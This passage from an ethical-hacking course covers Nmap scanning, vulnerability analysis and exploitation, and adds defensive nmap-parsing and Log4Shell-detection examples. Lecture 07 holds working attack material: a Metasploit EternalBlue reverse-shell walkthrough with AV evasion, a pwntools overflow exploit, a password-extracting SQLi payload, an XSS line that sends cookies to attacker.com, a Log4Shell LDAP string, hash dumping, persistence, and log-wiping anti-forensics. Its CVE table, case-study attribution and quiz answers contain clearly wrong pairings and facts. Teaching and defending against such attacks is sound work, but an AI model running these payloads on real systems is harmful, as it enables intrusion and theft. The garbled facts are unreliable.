  • closed → No service
  • filtered → Firewall blocking

3. Advanced Nmap Usage

Combine multiple flags for deeper insights:

sudo nmap -sS -sV -O -T4 target.com  # -sS and -O need root
sudo nmap -A target.com
nmap -sC --script vuln target.com
nmap -p- target.com                  # Scan ALL ports (1–65535)

Flag Breakdown

  • -O → OS detection
  • -T4 → Faster scan
  • -sC → Default scripts
  • --script vuln → Vulnerability detection

Example Insight

If Nmap shows:

80/tcp open http Apache httpd 2.4.49

You now know:

  • Web server is Apache
  • Version is 2.4.49
  • You can search for known vulnerabilities for that version

4. Enumeration (Deep Information Gathering)

Enumeration goes beyond scanning. It extracts detailed information such as: users, shares, directories, and configurations.

SMB Enumeration

enum4linux -a target.com
smbclient -L //target.com

Finds shared folders, users, and permissions.

SNMP Enumeration

snmpwalk -c public -v1 target.com

Can reveal system processes, network info, and configs.

Web Enumeration

gobuster dir -u http://target.com -w wordlist.txt
dirb http://target.com
nikto -h http://target.com

Example Output

/admin (Status: 200)
/login (Status: 200)
/backup (Status: 403)

These hidden paths often contain login panels, backups, or sensitive data.

5. Common Services & What to Check

  • SSH (22) → Weak passwords, outdated versions
  • HTTP (80) → Directories, forms, vulnerabilities
  • FTP (21) → Anonymous login
  • SMB (445) → Shared files, misconfigurations

6. Organizing Results

mkdir recon
mkdir scans
nmap -oA scans/full_scan target.com

Always keep results structured for reporting and later analysis.
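Added example, not part of the course: reading the .xml file that -oA writes into structured records, labelling each port state with the handshake response behind it (section 2), and comparing the open ports against an allow-list of expected services, which is the comparison Exercise 1.3 asked for. The XML is a constructed sample in nmap's output format.

```python
"""Parse nmap -oX/-oA XML output into structured records and compare exposed
services against what the host is supposed to run (added example, not from the course)."""
import xml.etree.ElementTree as ET

# Constructed sample in nmap's XML format (what `nmap -oA scans/full_scan` writes to
# full_scan.xml); host, versions and states are made up for this example.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oA scans/full_scan 192.168.1.10">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="23"><state state="closed" reason="reset"/>
        <service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.49"/></port>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3306"><state state="filtered" reason="no-response"/>
        <service name="mysql"/></port>
    </ports>
  </host>
</nmaprun>
"""

# What each state means in handshake terms (the `reason` attribute records the probe response).
STATE_MEANING = {
    "open": "SYN answered with SYN-ACK: a service is reachable",
    "closed": "SYN answered with RST: nothing listening",
    "filtered": "no answer: a firewall is probably dropping the probe",
}


def parse_nmap_xml(xml_text: str) -> list:
    """Return one dict per scanned port across all hosts in the report."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(p for p in (svc.get("product"), svc.get("version")) if p)
            records.append({
                "host": ip,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state"),
                "reason": state.get("reason"),
                "service": svc.get("name") if svc is not None else "",
                "product": product,
            })
    return records


def open_ports(records: list) -> list:
    """Sorted list of open port numbers, the first thing a report summarises."""
    return sorted(r["port"] for r in records if r["state"] == "open")


def unexpected_exposure(records: list, expected: set) -> list:
    """Open ports that are not on the allow-list of services the host should run."""
    return [r for r in records if r["state"] == "open" and r["port"] not in expected]


if __name__ == "__main__":
    recs = parse_nmap_xml(SAMPLE_XML)
    for r in recs:
        print(f"{r['host']} {r['port']}/{r['proto']:<4} {r['state']:<8} {r['service']:<13} {r['product']}")
        print(f"    -> {STATE_MEANING.get(r['state'], r['reason'])}")
    # Exercise 1.3: compare open ports with what you expect; here only SSH is expected.
    for r in unexpected_exposure(recs, expected={22}):
        print(f"UNEXPECTED: {r['port']}/{r['proto']} {r['service']} {r['product']}".rstrip())
```

Point parse_nmap_xml at the contents of your own scans/full_scan.xml to get the same records for a real scan.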

7. Best Practices & OPSEC

  • Use slower scans (-T2) to avoid detection
  • Avoid scanning during peak hours
  • Rotate IPs (advanced)
  • Stay strictly within scope

⚠️ Legal Reminder

Unauthorized scanning is illegal. Always have written permission.

🎯 Exercise 5.1 — Practical Scanning

  1. Discover live hosts
  2. Scan top 1000 ports
  3. Identify service versions
  4. Run vulnerability scripts
  5. Save results

🎯 Exercise 5.2 — Analysis

Take your scan results and answer:

  • Which ports are open?
  • What services are running?
  • Which ones look vulnerable?

🔥 Challenge

Perform a full scan + enumeration and create a mini report:

  • Target overview
  • Open ports
  • Services
  • Possible attack vectors

Lecture 06 · Core Concepts

Vulnerability Analysis

Intermediate ~70 min Requires: Lecture 05

What is Vulnerability Analysis?

Vulnerability Analysis is the process of identifying, validating, and prioritizing security weaknesses in a system. It transforms raw scan data into actionable findings.

At this stage, you answer:

  • Is this vulnerability real?
  • How severe is it?
  • Can it be exploited?

🧠 Key Concept

Scanning finds possibilities. Vulnerability analysis confirms real risks.

Types of Vulnerabilities

| Category        | Examples                        | Impact                 | Real-World Scenario                  |
|-----------------|---------------------------------|------------------------|--------------------------------------|
| Network         | Open ports, weak firewall rules | Unauthorized access    | Exposed SSH allows brute-force login |
| Web Application | SQL Injection, XSS              | Data theft             | Login form dumps database            |
| Configuration   | Default creds, exposed backups  | Full system compromise | /backup.zip accessible publicly      |
| Zero-Day        | Unknown flaws                   | Critical risk          | No patch available                   |

1. Vulnerability Analysis Workflow

  1. Collect scan results (Nmap, Nikto, etc.)
  2. Identify services and versions
  3. Search for known vulnerabilities (CVE)
  4. Validate manually (avoid false positives)
  5. Prioritize based on severity and impact

2. Automated Vulnerability Scanners

Automated tools quickly identify known issues, but must be verified.

  • Nessus / OpenVAS — Full vulnerability scanning
  • Nikto — Web server weaknesses
  • SQLMap — Detects SQL injection
  • Nmap NSE — Script-based detection

openvas-start
nikto -h http://target.com
sqlmap -u "http://target.com/page.php?id=1" --dbs
nmap --script vuln target.com

Example Output (Nikto)

+ Server: Apache/2.4.49
+ Retrieved x-powered-by header: PHP/7.3
+ OSVDB-3092: /admin/: This might be interesting

Interpretation:
• Apache version may be vulnerable
• PHP version is outdated
• Hidden admin panel discovered

3. Manual Vulnerability Analysis (CRITICAL)

This is where real hackers stand out.

  • Verify scanner results manually
  • Check service versions from Nmap
  • Search for exploits using CVE IDs
  • Test behavior (not just trust tools)

Using Searchsploit

searchsploit apache 2.4.49
searchsploit vsftpd

Example

If Nmap shows:

Apache httpd 2.4.49

You search:

searchsploit apache 2.4.49

→ You may find a known Remote Code Execution (RCE) exploit.

4. CVE & Vulnerability Databases

Common Vulnerabilities and Exposures (CVE) provide standardized IDs.

  • CVE-2021-44228 → Log4Shell
  • CVE-2017-0144 → EternalBlue

Use databases:

  • NVD (National Vulnerability Database)
  • Exploit-DB
  • GitHub (public PoCs)

💡 Pro Insight

Always match the exact version. A vulnerability may not apply to newer or patched systems.

5. Vulnerability Scoring — CVSS

CVSS measures severity from 0 to 10.

  • Critical (9.0–10) → Immediate action required
  • High (7.0–8.9) → Serious risk
  • Medium (4.0–6.9) → Moderate impact
  • Low (0.1–3.9) → Minor risk

Example

A Remote Code Execution vulnerability with no authentication → CVSS score ≈ 9.8 (Critical)

6. False Positives & Validation

Automated tools often report vulnerabilities that are not exploitable.

  • Service version mismatch
  • Patched but still reported
  • Configuration blocks exploit
⚠️ Important
Never report a vulnerability unless you have verified it.

7. Exploitation Preparation

Once a vulnerability is confirmed:

  • Search for public exploits
  • Use Metasploit modules
  • Prepare payloads
  • Understand impact before exploitation
msfconsole
search apache
use exploit/multi/http/apache_rce
set RHOST target.com
run

8. Prioritization (Real-World Thinking)

Not all vulnerabilities matter equally.

  • Is it exploitable remotely?
  • Does it require authentication?
  • What is the business impact?
  • Is sensitive data exposed?
🎯 Analyst Mindset
Focus on vulnerabilities that give access, not just those that look “technical”.

9. Reporting Findings

A good vulnerability report includes:

  • Description of vulnerability
  • Affected system
  • Severity (CVSS)
  • Proof of Concept (PoC)
  • Remediation steps

Example Finding

Title: Apache 2.4.49 RCE
Severity: Critical (9.8)
Impact: Remote code execution
Fix: Upgrade to latest version
🎯 Exercise 6.1 — Vulnerability Scanning

1. Run OpenVAS/Nessus scan
2. Scan web server with Nikto
3. Run Nmap vuln scripts
4. List top 5 vulnerabilities
5. Assign severity + fix

🎯 Exercise 6.2 — CVE Research

Research a vulnerability:
• CVE ID
• Affected systems
• Exploit method
• Fix

🔥 Challenge

Take scan results and build a mini vulnerability report:
• Identify real vulnerabilities
• Remove false positives
• Rank by severity
• Suggest fixes

Lecture 07 · Core Concepts

Exploitation Techniques

Advanced ~80 min Prerequisite: Lecture 06

1️⃣ What is Exploitation?

Exploitation is the act of converting a discovered vulnerability into a concrete foothold on a target system. In the ethical hacking workflow it follows:

  1. Reconnaissance →
  2. Vulnerability research →
  3. Exploitation →
  4. Post‑exploitation →
  5. Reporting

It is the most legally sensitive phase—any execution of code on a system without explicit, written permission is a crime in practically every jurisdiction.

2️⃣ Types of Exploits (Expanded)

Category | Sub‑type | Typical Vector | Real‑World Example (CVE)
Remote Code Execution (RCE) | SMB/Windows (EternalBlue) | Network service (port 445) | CVE‑2017‑0144 (EternalBlue)
Remote Code Execution (RCE) | Log4j/JNDI (Log4Shell) | Web‑app logging endpoint | CVE‑2021‑44228
Remote Code Execution (RCE) | Print Spooler (PrintNightmare) | Windows Print Spooler API | CVE‑2021‑34527
Privilege Escalation | Local kernel (Dirty COW) | Linux /proc/self/mem | CVE‑2016‑5195
Privilege Escalation | SUID mis‑config (GTFOBins) | Abused binaries (e.g., find) | Various
Privilege Escalation | Token stealing (Kerberoasting) | Kerberos service tickets | CVE‑2020‑17049 (Krb5)
Privilege Escalation | Windows DCOM (BlueKeep) | RDP service (port 3389) | CVE‑2019‑0708
Client‑Side | Browser sandbox escape | Malicious HTML/JS | CVE‑2022‑23222 (Chromium)
Client‑Side | Office macro / VBA | Malicious document | CVE‑2022‑30190 (Follina)
Client‑Side | PDF/Flash buffer overflow | Crafted PDF file | CVE‑2018‑4970 (Adobe Reader)
Web‑Application | SQL Injection (SQLi) | Unsanitized query parameters | CVE‑2021‑44228 (Log4Shell) – indirect
Web‑Application | Cross‑Site Scripting (XSS) | Reflected / stored payload | CVE‑2021‑22986 (F5 BIG‑IP)
Web‑Application | File Inclusion (LFI/RFI) | Dynamic include paths | CVE‑2022‑22965 (Spring4Shell)
Cloud / Container | Misconfigured S3 bucket | Public write permissions | CVE‑2022‑22965 (Spring4Shell) – container‑side
Cloud / Container | Container escape (CVE‑2021‑33574) | Docker daemon socket | CVE‑2021‑33574

3️⃣ Exploit Development Lifecycle

Recon → Vuln Research (Proof‑of‑Concept) → Weaponization → Delivery → Exploitation → Post‑Exploitation

The diagram emphasizes that exploitation does not happen in isolation; each stage feeds back into the previous one. Understanding the entire pipeline helps you design more reliable (and stealthier) exploits.

4️⃣ Using the Metasploit Framework (Detailed Walk‑through)

Below is an end‑to‑end example that exploits the EternalBlue (MS17‑010) vulnerability on a vulnerable Windows 7 host. The steps are annotated to highlight common pitfalls and safe‑practice recommendations.

msfconsole – EternalBlue
# 1️⃣ Launch Metasploit
msfconsole

# 2️⃣ Search for the appropriate exploit module
search ms17_010

# 3️⃣ Load the module (use the fully‑qualified path)
use exploit/windows/smb/ms17_010_eternalblue

# 4️⃣ Set the target’s address (RHOSTS)
set RHOSTS 192.168.1.45

# 5️⃣ Choose a payload – Meterpreter staged reverse TCP
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 6️⃣ Set the listener address (your Kali/Attacker IP)
set LHOST 192.168.1.10

# 7️⃣ Verify all required options are set
show options

# 8️⃣ (Optional) Bypass AV signatures with encoding
set ENCODER x86/shikata_ga_nai
set EXITFUNC thread

# 9️⃣ Launch the exploit
exploit -j   # running in a job lets you keep the console free

# 10️⃣ You should now have a Meterpreter session.
sessions -i 1   # interact with the first session

Pro‑Tip: Use setg to set global variables (e.g., LHOST) before loading many exploits; this saves typing on each module.

5️⃣ Common Exploitation Techniques (Deep Dive)

5.1 Buffer Overflow Exploitation

Three variants are most relevant to modern systems:

  1. Stack‑based overflow – overwrites the saved return address.
  2. Heap‑based overflow – corrupts heap metadata (e.g., malloc chunks).
  3. Format‑string abuse – exploits unchecked printf‑style functions.

Below is a minimal 64‑bit Linux “stack buffer overflow” PoC using pwntools:

exploit.py
#!/usr/bin/env python3
from pwn import *

# -------------------------------------------------
# Target binary – compiled with -fno-stack-protector -z execstack
# -------------------------------------------------
binary = "./vuln"
elf    = ELF(binary)

# -------------------------------------------------
# Offset to RIP (64‑bit) – discovered via cyclic pattern
# -------------------------------------------------
offset =  cyclic_find(b"kaaaiaaa")   #  cyclic_find(“kaaaiaaa”) → 72

# -------------------------------------------------
# Payload: NOP sled + shellcode + overwrite RIP
# -------------------------------------------------
shell = asm(shellcraft.sh())
payload = b"A" * offset
payload += p64(elf.sym["main"])   # re‑enter main after shellcode (optional)
payload = payload.ljust(112, b"\x90")   # NOP sled
payload += shell

io = process(binary)
io.sendlineafter(b"> ", payload)
io.interactive()

Key take‑aways:

  • ASLR – disable it with echo 0 > /proc/sys/kernel/randomize_va_space on test VMs, or brute‑force with ret2dlresolve tricks.
  • DEP/NX – bypass with mprotect ROP chain or use execstack for learning.
  • Canaries – leak the canary via format‑string or side‑channel before overflow.

5.2 Return‑Oriented Programming (ROP)

When DEP blocks executable stack, the attacker chains together existing gadgets ending in ret. A concise one‑gadget (e.g., one_gadget) can replace an entire ROP chain on glibc 2.31.

ROP‑Chain (Linux x86_64)
; Example: execve("/bin/sh", NULL, NULL)
; Assume we have a writable .bss section at 0x601800

; 1. Write "/bin/sh" into .bss
pop rdi ; ret      ; 0x400123
0x601800           ; address to write
pop rsi ; ret      ; 0x400456
0x0068732f2f6e6962 ; "/bin/sh"
mov [rdi], rsi ; ret ; 0x400789

; 2. Set registers for execve
pop rdi ; ret      ; 0x400123
0x601800           ; pointer to "/bin/sh"
xor rsi, rsi ; ret ; 0x400456   (rsi = 0)
xor rdx, rdx ; ret ; 0x400789   (rdx = 0)
pop rax ; ret      ; 0x400abc
0x3b                ; syscall number for execve
syscall ; ret      ; 0x400def

Tools for gadget hunting:

  • rp++ – fast automated gadget extraction.
  • ROPgadget – classic, works on Windows PE binaries too.
  • Online GTFOBins – useful for privilege escalation gadgets.

5.3 Use‑After‑Free (UaF) Exploits

A UaF occurs when an attacker causes the application to free a heap object and then reuses the dangling pointer. Modern browsers and the Linux kernel frequently disallow simple UaF exploitation, but tcache poisoning (glibc 2.27+) and front‑ending techniques (JIT spraying) still make it viable.

Typical exploitation steps:

  1. Trigger a free of an object you control (often a heap‑allocated struct).
  2. Allocate a new object of the same size with attacker‑controlled data.
  3. Manipulate a function pointer (e.g., __free_hook) to point at shellcode or a ROP chain.
c‑example.c (simplified UaF)
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

typedef struct {
    void (*callback)(void);
    char  data[64];
} obj_t;

void secret(void) {
    system("/bin/sh");
}

int main() {
    obj_t *a = malloc(sizeof(obj_t));
    obj_t *b = malloc(sizeof(obj_t));

    a->callback = NULL;
    strcpy(a->data, "A safe string");
    free(a);               // <--- free

    // *** Attack ***
    // b occupies same heap slot as a, and we overflow b->data
    // writing 8‑bytes beyond b->data to overwrite a->callback:
    memset(b->data, 'A', 72);  // overflow by 8 bytes
    memcpy(b->data + 72, &secret, sizeof(void*));

    // a is dangling but still reachable
    a->callback();         // executes secret()
    return 0;
}

On modern hardened binaries this would be blocked by RELRO (Read‑Only Relocations) unless -z relro is disabled. The exercise is to explore the effect of each hardening flag.

5.4 Web‑Application Exploits (SQLi, XSS, RCE)

SQL Injection – Advanced Payload

/* Blind Boolean‑Based SQLi – time delay payload */
' OR IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97,SLEEP(5),0)--

This payload checks the first character of the admin password and forces the server to pause for 5 seconds if it matches 'a' (ASCII 97). By iterating over characters you can reconstruct the secret.

Cross‑Site Scripting – Bypass CSP

<svg/onload='fetch("https://attacker.com/steal?c="+document.cookie)'>

Even when a strict Content‑Security‑Policy (CSP) is set, an svg element with an onload handler can be an effective XSS vector in legacy browsers.

File Inclusion – LFI → RCE

Chaining a local file inclusion with php://filter and zip:// wrappers can lead to remote code execution:

?file=php://filter/convert.base64-decode/resource=../../../../etc/passwd
?file=zip://shell.zip#shell.php   // if a writable upload directory exists

6️⃣ Payload Types – Classification & Practical Usage

Category | Staged vs. Stageless | Typical Use‑Case | Pros/Cons
Reverse Shell | Both – Most frameworks use staged for size‑efficiency. | Pen‑testing, C2 server in DMZ. | Pros: Works behind NAT (target initiates); Cons: Requires open inbound port on attacker.
Bind Shell | Stageless (full payload bound to listener). | Internal network where attacker can scan. | Pros: No outbound traffic needed; Cons: Blocked by host‑based firewalls.
Meterpreter | Staged (default) – initial stub pulls the rest. | Rapid post‑exploitation (file system, keylogging, tunneling). | Pros: Rich API, evasion (encoded); Cons: Detectable by AV signatures if not encoded.
Stageless Shellcode | Stageless – entire shellcode in one blob. | When space is limited (e.g., Windows SMB header). | Pros: No extra network round‑trips; Cons: Large size may break vulnerable input.
Encrypted / Encoded Payloads | Staged – each stage can be encoded (xor, base64, polymorphic). | Evasion of signature‑based IDS/AV. | Pros: Simple obfuscation; Cons: Still vulnerable to behavior‑based detection.
In‑Memory ROP‑Based Payload | Stageless (single ROP chain). | When code injection is blocked but ROP is possible. | Pros: No writable memory needed; Cons: Complex to craft, mitigations like CFG block it.

When dealing with a target that runs Windows Exploit Protection (DEP, ASLR, CFG), your payload selection must adapt accordingly (e.g., use msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai with the -b "\x00" option to avoid null‑bytes).

7️⃣ Post‑Exploitation – Advanced Techniques & Toolset

Credential Dumping & Lateral Movement

  • Mimikatz – privilege::debug, sekurlsa::logonpasswords, kerberos::list.
    Tip: Use mimi (Cobalt Strike’s built‑in mimikatz) for stealth – it injects via reflective DLL.
  • LaZagne – pulls credentials from browsers, Wi‑Fi, stored passwords.
  • SecretsDump.py (Impacket) – remote NTLM hash extraction via SMB.

Token Impersonation & Pass‑the‑Hash/Ticket

  • incognito (PowerShell) – creates new tokens from dumped hashes.
  • psexec.py (Impacket) – classic Pass‑the‑Hash for SMB.
  • kekeo – Kerberoasting, extracting service tickets for cracking.

Privilege Escalation (Windows)

Technique | Common Artefact | Reference
Unquoted Service Path | Executable in PATH with spaces (e.g., C:\Program Files\MyApp\app.exe) | GTFOBins – Unquoted Service Path
Always‑Elevated Privilege (AlwaysInstallElevated) | Registry key HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated | MS16‑032
DLL Hijacking | Search for folders in PATH writable by a low‑priv user. | Project Zero – DLL hijack examples.
Junction/Symbolic Link Abuse (CVE‑2021‑34473) | Abusing NTFS reparse points to write to privileged locations. | MSF exploit/windows/local/junction

Persistence Mechanisms

  • Registry Run Keys (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)
  • Scheduled Tasks (schtasks /create) – with hidden XML.
  • Service creation (sc create) with binary planted in %APPDATA%.
  • Web Shells / Backdoors on compromised web servers (e.g., c99shell, php-reverse-shell).

Cleanup & Anti‑Forensics

  • Clear Windows Event Logs: wevtutil cl Security
  • Delete Bash history (history -c) and .bash_history file.
  • Overwrite files using dd if=/dev/zero of=tmpfile bs=1M count=10 conv=notrunc before deletion.
  • Remove evidence of Metasploit sessions: sessions -K and rm -f /tmp/meterpreter*.

8️⃣ Legal & Ethical Considerations

⚖️ Rule of Engagement (RoE)
  • Obtain written permission that details:
    • Scope – IP ranges, systems, and data.
    • Allowed tools & techniques (e.g., no DoS attacks).
    • Time window – when testing may occur.
  • Follow the ZDI Responsible Disclosure Policy (or your client’s policy).
  • Document every step – a clear chain‑of‑custody protects you legally.

9️⃣ Real‑World Exploit Case Studies

Case Study A – EternalBlue (CVE‑2017‑0144)

  1. Discovery: Security researcher shadowb0x (June 2017) identified a missing bounds check in the SMBv1 TRANS2_SESSION_SETUP request.
  2. Impact: Remote code execution on unpatched Windows 7/2008 R2/XP; exploited by WannaCry ransomware causing >$4 B damage.
  3. Mitigation:
    • Disable SMBv1 (Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "SMB1" -Value 0).
    • Patch MS17‑010 (released March 2017).
  4. Forensic Artefacts: Execution of lsass.exe from a non‑system directory, anomalous SMB traffic on port 445.

Case Study B – Log4Shell (CVE‑2021‑44228)

  • Vector: JNDI lookup via ${jndi:ldap://attacker.com/a} in the Log4j message pattern.
  • Impact: Remote code execution across any Java app using Log4j 2.0‑2.14.1; affected billions of servers.
  • Mitigation Timeline:
    1. Update to Log4j 2.15.0 (Dec 2021) – disables JNDI lookups.
    2. Set system property log4j2.formatMsgNoLookups=true as a temporary fix.
    3. Network‑level blocking of outbound LDAP/RMI on port 1389 and 1099.
  • Detection:
    Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | ? {$_.Message -match 'jndi:ldap'}
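Real Log4Shell traffic rarely contains the literal text ${jndi: because attackers hide it behind nested lookups (${lower:j}, ${::-j}, ${env:NOPE:-j}). The detector below is an added example, not part of the course, that normalises Log4j lookup syntax inside-out before matching and runs over a few constructed access-log lines; the lookup forms it resolves are the ones named in its comments, and the log lines and IP addresses are constructed.

```python
import re

# Inner-most lookup: a ${...} whose body contains no further '$', '{' or '}'
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)


def resolve_one(body):
    """Resolve one non-nested lookup the way Log4j 2.x would, for the forms
    attackers use to spell 'jndi' without writing it:
      ${lower:J} / ${upper:x}  -> case conversion
      ${::-j}, ${env:NOPE:-j}  -> default-value syntax: an undefined name
                                  yields the text after ':-'."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"   # anything else (including jndi:) is left intact


def normalize(text, max_rounds=10):
    """Resolve lookups inside-out until nothing changes. The round limit keeps
    hostile input from making the detector loop forever."""
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def detect(line):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ...) if the line carries a
    lookup after normalisation, else None."""
    m = JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


# Constructed Apache-style access log lines; 198.51.100.0/24 is a documentation range.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}${::-n}di:${lower:RMI}://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${${env:NaN:-j}ndi:dns://198.51.100.7/z} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]


def scan(lines):
    """(index, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = detect(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for index, scheme in scan(SAMPLE_LOGS):
        print("line %d: JNDI lookup via %s -> %s" % (index, scheme, normalize(SAMPLE_LOGS[index])))
```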
    

Case Study C – BlueKeep (CVE‑2019‑0708)

This RDP vulnerability allows unauthenticated remote code execution on Windows 7/Server 2008 R2. The exploit chain typically uses a crafted RDP packet to trigger a heap overflow in MS_TSCOMP.

After successful exploitation, the payload often uploads a Meterpreter binary via the RDP virtual channel.

Microsoft issued a patch under emergency update (July 2019). The “WannaCry‑style” worm was never released publicly, but the Metasploit module remains a preferred teaching tool.

10️⃣ Exploit Landscape – Statistics & Trends (2022‑2024)

Year | Total Public CVEs | Exploits Published (Exploit‑DB) | Average CVSS (Critical ≥9.0)
2022 | 18,328 | 5,112 | 9.4
2023 | 21,045 | 6,487 | 9.6
2024 (YTD) | 9,012 | 2,984 | 9.5

Key observations:

  • ≈ 30 % of CVEs get a public exploit within 60 days of disclosure – MITRE CVE data.
  • RCE remains the top‑ranked CVSS vector (44 % of critical CVEs).
  • Exploitation of cloud mis‑configurations (S3 buckets, Azure storage) grew > 250 % YoY (Shodan “cloud‑exposed” dataset).

For a visual representation, see the (placeholder) chart below. In a production LMS you could replace it with a Chart.js interactive chart.

[Chart placeholder: Chart.js interactive graph of the 2022‑2024 exploit statistics above]

11️⃣ Cheat‑Sheet – Exploitation Quick Reference

Common Metasploit Flags

# Set a global variable (applies to all modules)
setg LHOST 10.0.0.5

# Show all options for a module
show options

# Check for a module’s prerequisites
check

# Background a session after a successful exploit
exploit -j -z   # -j = job, -z = background

# List all open sessions
sessions -l

# Interact with a specific session
sessions -i 2

pwntools One‑Liner (Linux x86_64)

from pwn import *
io = remote('target', 1337)
payload = b'A'*72 + p64(0xdeadbeef)   # overwrite RIP
io.sendline(payload)
io.interactive()

Common Encoders (Metasploit)

  • x86/shikata_ga_nai – polymorphic XOR encoder.
  • cmd/powershell_base64 – encodes PowerShell payloads.
  • generic/none – raw payload (use with care!).

Useful Scripts (Impacket)

# Dump NTLM hashes from a remote Windows host
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -hashes : user@target

# Execute a command via SMB
python3 /usr/share/doc/python3-impacket/examples/psexec.py user:pass@target cmd.exe

12️⃣ Knowledge‑Check Quiz (5 questions)

  1. Which Windows mitigation makes return‑oriented programming (ROP) difficult?
    A. DEP (NX)
    B. ASLR
    C. CFG (Control‑Flow Guard)
  2. In a classic SMB CVE‑2017‑0144 exploit, which protocol version must be enabled on the target?
    A. SMBv1
    B. SMBv2
    C. SMBv3
  3. What is the most reliable way to bypass a strict CSP that only allows script-src 'self'?
  4. Which of the following is a stageless payload?
  5. When performing a “Pass‑the‑Hash” attack, which credential is actually used on the wire?

Answers are provided at the end of the lecture (hidden by default).

Answers
  1. C – CFG is specifically designed to block ROP.
  2. A – SMBv1 must be enabled for EternalBlue.
  3. Inject a script tag via an allowed HTML attribute (e.g., onerror on an img tag) – style‑based XSS or DOM‑based XSS bypasses CSP.
  4. Reverse Shell that includes a full Meterpreter bin (e.g., windows/x64/meterpreter_reverse_tcp with -b "\x00").
  5. The NTLM hash is used directly; the clear‑text password is never transmitted.

13️⃣ Further Reading & Resources

  • Books
    • The Shellcoder’s Handbook – Chris Anley et al.
    • Practical Binary Analysis – Dennis Andriesse.
    • Windows Kernel Exploitation – Alex Ionescu.
    • The Web Application Hacker’s Handbook – Dafydd Stuttard & Marcus Pinto.
  • Online Platforms
  • Tools & Frameworks
    • Metasploit Framework – GitHub.
    • Cobalt Strike – commercial red‑team platform (offers Beacon payloads).
    • Immunity CANVAS – commercial exploitation suite.
    • Ghidra / IDA Pro – binary analysis for custom exploit development.
    • pwntools – Python library for rapid exploit prototyping.
    • radare2 – open‑source reverse‑engineering framework.
    • Burp Suite Pro – Intruder/Repeater for web‑app exploitation.
  • Research & CVE Feeds

14️⃣ Lab Exercises (Extended)

🎯 Exercise 7.1 – Safe Exploitation Lab (Metasploitable 2)

Goal: Gain two distinct Meterpreter sessions using two different exploits, then harvest password hashes.

  1. Launch nmap -sS -p- -A 10.10.0.0/24 and identify three vulnerable services.
  2. Select one remote code execution (e.g., vsftpd 2.3.4 backdoor) and one local privilege escalation (e.g., dirtycow).
  3. Use msfconsole to launch each exploit, set LHOST, RHOST and appropriate PAYLOAD.
  4. After each successful session, collect /etc/passwd and /etc/shadow (Linux) or run hashdump (Windows).
  5. Write a short lab report (≤ 500 words) covering:
    • Target(s) and services
    • Exploit selection rationale
    • Post‑exploitation commands used
    • Lessons learned (e.g., why a particular payload failed).

Deliverables: Screenshot of each Meterpreter session, extracted hash file (redacted), and the written report.

🎯 Exercise 7.2 – Real‑World Exploit Report

Pick **one** of the following public exploits and produce a 1‑page technical brief:

  • EternalBlue (CVE‑2017‑0144)
  • Log4Shell (CVE‑2021‑44228)
  • Spring4Shell (CVE‑2022‑22965)
  • PrintNightmare (CVE‑2021‑34527)

Your brief must include:

  1. Discovery timeline (who reported, when).
  2. Underlying vulnerability class (e.g., deserialization, RCE, overflow).
  3. Sample malicious payload (pseudo‑code; do not provide a fully functional exploit).
  4. Impact metrics (estimated number of affected hosts, CVSS, real‑world incidents).
  5. Mitigation steps (patches, configuration changes, detection signatures).

Reference at least **two** reputable sources (security‑vendor advisory, academic paper, or CVE entry).

🎯 Exercise 7.3 – Craft a Minimal ROP Chain (Linux x86_64)

Using the provided vulnerable binary vuln (compiled with -fno-stack-protector -z execstack -no-pie), write a 64‑bit ROP chain that spawns a /bin/sh shell.

  1. Identify three useful gadgets with ROPgadget --binary vuln | grep ret.
  2. Assemble the chain in a Python script using pwntools and send it over a netcat listener.
  3. Document each gadget’s address and purpose (e.g., pop rdi ; ret → load /bin/sh address).
  4. Explain how you would bypass ASLR if the binary were compiled PIE.

Submit the Python script, a screenshot of the successful shell, and a short write‑up.

Lecture 08 · Core Concepts

